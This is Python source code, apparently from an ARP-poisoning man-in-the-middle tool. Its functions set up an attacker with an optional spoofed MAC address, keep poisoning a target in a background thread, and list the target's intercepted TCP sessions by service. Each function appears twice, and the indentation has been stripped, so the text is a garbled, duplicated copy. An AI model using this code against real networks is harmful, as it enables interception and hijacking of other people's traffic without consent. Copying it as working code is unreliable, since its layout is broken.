def get_mitm(parsed_args):
"""
create an object of type Mitm based on arguments received
"""
args = parsed_args
if not args.dev:
sys.exit(sys.argv[0] + ' -h for help\n[!] Must specify interface')
dev = "%s" % "','".join(args.dev)
original_mac_addr = utils.get_mac_by_dev(dev)
mac_addr, changed = original_mac_addr, False
if not args.source:
try:
args.source = utils.get_default_gateway_linux()
except OSError:
args.source = raw_input('[!] Unable to retrieve default gateway, please specify one: ')
if not utils.is_ipv4(args.source):
exit('[!] Unable to retrieve default gateway, please specify one using -s option')
else:
pass
if not args.target:
args.target = raw_input('[?] No target address specified, please insert one: ')
if not utils.is_ipv4(args.target):
exit('[!] Must specify at least one target address')
else:
if len(args.target) == 1:
args.target = ''.join(args.target)
conf = ConfigParser.ConfigParser()
conf.read('./creak/config')
verbose = conf.getboolean('output', 'VERBOSE')
debug = conf.getboolean('output', 'DEBUG')
if args.verbosity:
verbose = True
if args.debug:
debug = True
if args.spoof is True:
choice = raw_input('[+] In order to change MAC address ' + G + dev + W
+ ' must be temporary put down. Proceed?[y/n] ')
if choice == 'y':
if not args.macaddr and not args.manufacturer:
mac_addr = utils.fake_mac_address([], 1)
elif args.macaddr and not args.manufacturer:
if utils.parse_mac(args.macaddr) != utils.parse_mac(original_mac_addr):
mac_addr = utils.fake_mac_address(utils.mac_to_hex(args.macaddr))
elif args.manufacturer:
macs = utils.get_manufacturer(args.manufacturer)
mac_addr = utils.fake_mac_address(utils.mac_to_hex(random.choice(macs)))
try:
utils.change_mac(dev, mac_addr)
changed = True
except OSError:
pass
print("[+] Waiting for wireless reactivation..")
if args.mode == 1 or args.mode == 2:
time.sleep(10)
else:
time.sleep(4)
# no spoof but set mac address anyway
elif args.macaddr:
mac_addr = args.macaddr
print("[+] Using " + G + mac_addr + W + " MAC address\n"
"[+] Set " + G + args.source + W + " as default gateway")
if conf.get('output', 'ENGINE').lower() == 'scapy':
return (args, changed, original_mac_addr,
cmitm.ScapyMitm(dev, utils.parse_mac(mac_addr), args.source,
args.target, debug, verbose))
return (args, changed, original_mac_addr,
cmitm.PcapMitm(dev, utils.parse_mac(mac_addr), args.source,
args.target, debug, verbose))
def get_mitm(parsed_args):
"""
create an object of type Mitm based on arguments received
"""
args = parsed_args
if not args.dev:
sys.exit(sys.argv[0] + ' -h for help\n[!] Must specify interface')
dev = "%s" % "','".join(args.dev)
original_mac_addr = utils.get_mac_by_dev(dev)
mac_addr, changed = original_mac_addr, False
if not args.source:
try:
args.source = utils.get_default_gateway_linux()
except OSError:
args.source = raw_input('[!] Unable to retrieve default gateway, please specify one: ')
if not utils.is_ipv4(args.source):
exit('[!] Unable to retrieve default gateway, please specify one using -s option')
else:
pass
if not args.target:
args.target = raw_input('[?] No target address specified, please insert one: ')
if not utils.is_ipv4(args.target):
exit('[!] Must specify at least one target address')
else:
if len(args.target) == 1:
args.target = ''.join(args.target)
conf = ConfigParser.ConfigParser()
conf.read('./creak/config')
verbose = conf.getboolean('output', 'VERBOSE')
debug = conf.getboolean('output', 'DEBUG')
if args.verbosity:
verbose = True
if args.debug:
debug = True
if args.spoof is True:
choice = raw_input('[+] In order to change MAC address ' + G + dev + W
+ ' must be temporary put down. Proceed?[y/n] ')
if choice == 'y':
if not args.macaddr and not args.manufacturer:
mac_addr = utils.fake_mac_address([], 1)
elif args.macaddr and not args.manufacturer:
if utils.parse_mac(args.macaddr) != utils.parse_mac(original_mac_addr):
mac_addr = utils.fake_mac_address(utils.mac_to_hex(args.macaddr))
elif args.manufacturer:
macs = utils.get_manufacturer(args.manufacturer)
mac_addr = utils.fake_mac_address(utils.mac_to_hex(random.choice(macs)))
try:
utils.change_mac(dev, mac_addr)
changed = True
except OSError:
pass
print("[+] Waiting for wireless reactivation..")
if args.mode == 1 or args.mode == 2:
time.sleep(10)
else:
time.sleep(4)
# no spoof but set mac address anyway
elif args.macaddr:
mac_addr = args.macaddr
print("[+] Using " + G + mac_addr + W + " MAC address\n"
"[+] Set " + G + args.source + W + " as default gateway")
if conf.get('output', 'ENGINE').lower() == 'scapy':
return (args, changed, original_mac_addr,
cmitm.ScapyMitm(dev, utils.parse_mac(mac_addr), args.source,
args.target, debug, verbose))
return (args, changed, original_mac_addr,
cmitm.PcapMitm(dev, utils.parse_mac(mac_addr), args.source,
args.target, debug, verbose))
def list_sessions(self, stop, target_b=None, port=None):
"""
Try to get all TCP sessions of the target
"""
notorious_services = {
20: ' ftp-data session',
21: ' ftp-data session',
22: ' ssh session',
23: ' telnet session',
25: ' SMTP session',
80: ' HTTP session',
110: ' POP3 session',
143: ' IMAP session',
194: ' IRC session',
220: ' IMAPv3 session',
443: ' SSL session',
445: ' SAMBA session',
989: ' FTPS session',
990: ' FTPS session',
992: ' telnet SSL session',
993: ' IMAP SSL session',
994: ' IRC SSL session'
}
source = utils.get_default_gateway_linux()
if target_b and target_b != self.gateway:
source = utils.get_mac_by_ip(target_b)
pcap_filter = self._build_pcap_filter("ip host ", port)
packets = pcap.pcap(self.dev)
packets.setfilter(pcap_filter) # we need only self.target packets
# need to create a daemon that continually poison our target
poison_thread = Thread(target=self.poison, args=(
2,
target_b,
))
poison_thread.daemon = True
poison_thread.start()
print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G +
source + W + ' and ' + R + (','.join(self.target) if isinstance(
self.target, list) else self.target) + W + '\n')
sessions = {}
try:
for _, pkt in packets:
if stop():
break
eth = dpkt.ethernet.Ethernet(pkt)
ip_packet = eth.data
if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
tcp = ip_packet.data
if tcp.flags != dpkt.tcp.TH_RST:
sess = "%-25s <-> %25s" % (
inet_ntoa(ip_packet.src) + ":" + str(tcp.sport),
inet_ntoa(ip_packet.dst) + ":" + str(tcp.dport))
check = False
if sess not in sessions:
check = True
sessions[sess] = "Others"
if tcp.sport in notorious_services:
sessions[sess] = notorious_services[tcp.sport]
elif tcp.dport in notorious_services:
sessions[sess] = notorious_services[tcp.dport]
if check is True:
print(" [{:^5}] {} : {}".format(
len(sessions), sess, sessions[sess]))
self.sessions.append(sess)
except KeyboardInterrupt:
print('[+] Session scan interrupted\n\r')
self.restore(2)
utils.set_ip_forward(0)
def list_sessions(self, stop, target_b=None, port=None):
"""
Try to get all TCP sessions of the target
"""
notorious_services = {
20: ' ftp-data session',
21: ' ftp-data session',
22: ' ssh session',
23: ' telnet session',
25: ' SMTP session',
80: ' HTTP session',
110: ' POP3 session',
143: ' IMAP session',
194: ' IRC session',
220: ' IMAPv3 session',
443: ' SSL session',
445: ' SAMBA session',
989: ' FTPS session',
990: ' FTPS session',
992: ' telnet SSL session',
993: ' IMAP SSL session',
994: ' IRC SSL session'
}
source = utils.get_default_gateway_linux()
if target_b and target_b != self.gateway:
source = utils.get_mac_by_ip(target_b)
pcap_filter = self._build_pcap_filter("ip host ", port)
packets = pcap.pcap(self.dev)
packets.setfilter(pcap_filter) # we need only self.target packets
# need to create a daemon that continually poison our target
poison_thread = Thread(target=self.poison, args=(2, target_b, ))
poison_thread.daemon = True
poison_thread.start()
print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + source + W
+ ' and ' + R
+ (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n')
sessions = {}
try:
for _, pkt in packets:
if stop():
break
eth = dpkt.ethernet.Ethernet(pkt)
ip_packet = eth.data
if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
tcp = ip_packet.data
if tcp.flags != dpkt.tcp.TH_RST:
sess = "%-25s <-> %25s" % (inet_ntoa(ip_packet.src) + ":"
+ str(tcp.sport), inet_ntoa(ip_packet.dst) + ":"
+ str(tcp.dport))
check = False
if sess not in sessions:
check = True
sessions[sess] = "Others"
if tcp.sport in notorious_services:
sessions[sess] = notorious_services[tcp.sport]
elif tcp.dport in notorious_services:
sessions[sess] = notorious_services[tcp.dport]
if check is True:
print(" [{:^5}] {} : {}".format(len(sessions), sess, sessions[sess]))
self.sessions.append(sess)
except KeyboardInterrupt:
print('[+] Session scan interrupted\n\r')
self.restore(2)
utils.set_ip_forward(0)
